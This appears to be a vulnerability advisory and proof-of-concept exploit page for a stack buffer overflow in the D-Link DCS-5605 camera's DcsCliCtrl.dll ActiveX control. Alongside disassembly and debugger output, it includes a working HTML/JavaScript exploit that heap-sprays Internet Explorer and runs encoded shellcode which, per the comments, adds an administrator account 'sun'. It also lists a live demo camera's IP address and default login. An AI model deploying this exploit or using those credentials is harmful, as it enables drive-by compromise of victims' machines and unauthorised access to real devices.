扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 |
D-Link SecuriCam DCS-5605 Network Surveillance ActiveX Control DcsCliCtrl.dll lstrcpyW Remote Buffer Overflow Vulnerability tested against: Microsoft Windows Server 2003 r2 sp2 Internet Explorer 7/8 Live demo: http://203.125.227.70/eng/index.cgi username: dlink password: dlink product homepage: http://www.d-link.com/products/?pid=771 product description: "The DCS-5605 is a high performance camera for professional surveillance and remote monitoring. This network camera features motorized pan, tilt, and optical/digital zoom for ultimate versatility. The 10x optical zoom lens delivers the level of detail necessary to identify faces, license plate numbers, and other important details that are difficult to clearly distinguish using digital zoom alone" background: When browsing the device web interface, the user is asked to install an ActiveX control to stream video content. This control has the following settings: Description: Camera Stream Client Control File version: 1.0.0.4519 Binary path: C:\Program Files\NetworkSurveillanceAX\DcsCliCtrl.dll ProgID: DcsCliCtrl.DCSStrmControl.1 GUID: {721700FE-7F0E-49C5-BDED-CA92B7CB1245} Implements IObjectSafety: Yes Safe For Scripting (IObjectSafety): True Safe For Initialization (IObjectSafety): True Vulnerability: the ActiveX control exposes the SelectDirectory() method which supports one optional argument. See typelib: ... /* DISPID=22 */ /* VT_BSTR [8] */ function SelectDirectory( /* VT_VARIANT [12] [in] */ $varDefPath ) { /* method SelectDirectory */ } ... This method suffers of a stack based buffer overflow vulnerability because an unsafe lstrcpyW() call inside DcsCliCtrl.dll: ... 100712E0 81EC 34040000sub esp,434 100712E6 A1 2C841010mov eax,dword ptr ds:[1010842C] 100712EB 33C4 xor eax,esp 100712ED 898424 30040000mov dword ptr ss:[esp+430],eax 100712F4 53 push ebx 100712F5 8B9C24 48040000mov ebx,dword ptr ss:[esp+448] 100712FC 55 push ebp 100712FD 8BAC24 40040000mov ebp,dword ptr ss:[esp+440] 10071304 56 push esi 10071305 8BB424 4C040000mov esi,dword ptr ss:[esp+44C] 1007130C 57 push edi 1007130D 8BBC24 4C040000mov edi,dword ptr ss:[esp+44C] 10071314 68 08020000push 208 10071319 8D4424 34lea eax,dword ptr ss:[esp+34] 1007131D 6A 00push 0 1007131F 50 push eax 10071320 E8 0BC40300call DcsCliCt.100AD730 10071325 83C4 0Cadd esp,0C 10071328 85F6 test esi,esi 1007132A 74 0Cje short DcsCliCt.10071338 1007132C 56 push esi 1007132D 8D4C24 34lea ecx,dword ptr ss:[esp+34] 10071331 51 push ecx 10071332 FF15 D4D20C10call dword ptr ds:[<&KERNEL32.lstrcpyW>] ; kernel32.lstrcpyW <------------- ... An attacker could entice a remote user to browse a web page to gain control of the victim browser, by passing an overlong string to the mentioned method and overwriting critical structures (SEH). As attachment proof of concept code. Note, to reproduce the wanted crash: when the SelectDirectory() method is called the user is asked to select a destination folder for the stream recorder. To set EIP to 0x0c0c0c0c select a folder of choice, then proceed. When clicking Cancel you have an unuseful crash, however it could be possible that modifying the poc you will have EIP overwritten aswell. I think that it is also possible that other products might carry this dll, I could post an update if I find more. Additional note: 0:029> lm -vm DcsCliCtrl startendmodule name 08450000 0859e000 DcsCliCtrl (deferred) Image path: C:\Program Files\NetworkSurveillanceAX\DcsCliCtrl.dll Image name: DcsCliCtrl.dll Timestamp:Thu Aug 19 08:48:47 2010 (4C6CD3CF) CheckSum: 001325EC ImageSize:0014E000 File version: 1.0.0.4519 Product version:1.0.0.1 File flags: 0 (Mask 3F) File OS:4 Unknown Win32 File type:2.0 Dll File date:00000000.00000000 Translations: 0409.04e4 ProductName:Camera Streaming Client InternalName: DcsCliCtrl.dll OriginalFilename: DcsCliCtrl.dll ProductVersion: 1.0.0.1 FileVersion:1.0.0.4519 FileDescription:Camera Stream Client Control LegalCopyright: Copyright: (c) All rights reserved. <!-- D-Link DCS-5605 Network Surveillance ActiveX Control DcsCliCtrl.dll lstrcpyW Remote Buffer Overflow Vulnerability poc (ie7) Description: Camera Stream Client Control File version: 1.0.0.4519 Binary path: C:\Program Files\NetworkSurveillanceAX\DcsCliCtrl.dll ProgID: DcsCliCtrl.DCSStrmControl.1 GUID: {721700FE-7F0E-49C5-BDED-CA92B7CB1245} Implements IObjectSafety: Yes Safe For Scripting (IObjectSafety): True Safe For Initialization (IObjectSafety): True rgod --> <!-- saved from url=(0014)about:internet --> <html> please select a directory to download ... <object classid='clsid:721700FE-7F0E-49C5-BDED-CA92B7CB1245' id='obj' width=0 height=0 /> </object> <script language='javascript'> //add user one, user "sun" pass "tzu" shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" + "%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a" + "%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241" + "%u4142%u4230%u5841%u3850%u4241%u6d75%u6b39%u494c" + "%u5078%u3344%u6530%u7550%u4e50%u716b%u6555%u6c6c" + "%u614b%u676c%u3175%u6568%u5a51%u4e4f%u306b%u564f" + "%u4c78%u414b%u774f%u4450%u4841%u576b%u4c39%u664b" + "%u4c54%u444b%u7841%u466e%u6951%u4f50%u6c69%u6b6c" + "%u6f34%u3330%u6344%u6f37%u6a31%u646a%u474d%u4871" + "%u7842%u4c6b%u6534%u716b%u5144%u6334%u7434%u5835" + "%u6e65%u736b%u646f%u7364%u5831%u756b%u4c36%u644b" + "%u624c%u6c6b%u634b%u656f%u574c%u7871%u4c6b%u774b" + "%u4c6c%u464b%u7861%u4f6b%u7379%u516c%u3334%u6b34" + "%u7073%u4931%u7550%u4e34%u536b%u3470%u4b70%u4f35" + "%u7030%u4478%u4c4c%u414b%u5450%u4c4c%u624b%u6550" + "%u6c4c%u6e6d%u626b%u6548%u6858%u336b%u6c39%u4f4b" + "%u4e70%u5350%u3530%u4350%u6c30%u704b%u3568%u636c" + "%u366f%u4b51%u5146%u7170%u4d46%u5a59%u6c58%u5943" + "%u6350%u364b%u4230%u7848%u686f%u694e%u3170%u3370" + "%u4d58%u6b48%u6e4e%u346a%u464e%u3937%u396f%u7377" + "%u7053%u426d%u6444%u756e%u5235%u3058%u6165%u4630" + "%u654f%u3133%u7030%u706e%u3265%u7554%u7170%u7265" + "%u5353%u7055%u5172%u5030%u4273%u3055%u616e%u4330" + "%u7244%u515a%u5165%u5430%u526f%u5161%u3354%u3574" + "%u7170%u5736%u4756%u7050%u306e%u7465%u4134%u7030" + "%u706c%u316f%u7273%u6241%u614c%u4377%u6242%u524f" + "%u3055%u6770%u3350%u7071%u3064%u516d%u4279%u324e" + "%u7049%u5373%u5244%u4152%u3371%u3044%u536f%u4242" + "%u6153%u5230%u4453%u5035%u756e%u3470%u506f%u6741" + "%u7734%u4734%u4570"); bigblock = unescape("%u0c0c%u0c0c"); headersize = 20; slackspace = headersize+shellcode.length; while (bigblock.length<slackspace) bigblock+=bigblock; fillblock = bigblock.substring(0, slackspace); block = bigblock.substring(0, bigblock.length-slackspace); while(block.length+slackspace<0x40000) block = block+block+fillblock; memory = new Array(); for (i=0;i<666;i++){memory[i] = block+shellcode} </script> <script defer=defer> var x = ""; for (i=0; i<200; i++){ x = x + unescape("%u4141%u4141"); } for (i=0; i<700; i++){ x = x + unescape("%u0c0c%u0c0c"); } obj.SelectDirectory(x); </script> |
体验盒子
